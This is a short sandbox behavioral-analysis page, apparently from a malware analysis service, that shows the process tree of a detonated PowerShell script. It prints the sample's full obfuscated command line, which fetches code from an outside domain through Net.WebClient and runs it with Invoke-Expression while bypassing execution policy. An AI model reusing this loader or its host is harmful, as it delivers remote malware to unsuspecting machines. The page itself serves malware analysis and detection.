| ZeroBOX

Behavioral Analysis

Process tree

  • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\13065365f51d88a4fb0c0dab4e9df858.txt.ps1

    2540
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -C SI Variable:/sM 'https://mt.dybep.fun/gna2_runner';SV l2 (((([Net.WebClient]::New()|Member)|Where{(Variable _).Value.Name -clike'*wn*d*g'}).Name));Set-Item Variable:2 ([Net.WebClient]::New());&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|Where{(Variable _).Value.Name -clike'*d'}).Name)($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Member|Where{(Variable _).Value.Name -clike'*Com*e'}).Name)('*e-*press*',1,1),[System.Management.Automation.CommandTypes]::Cmdlet)(Variable 2 -Valu).((GCI Variable:\l2).Value)((Get-Variable sM -ValueOnl))

      2668

Process contents

No process loaded Click on a process in the tree above to load its data.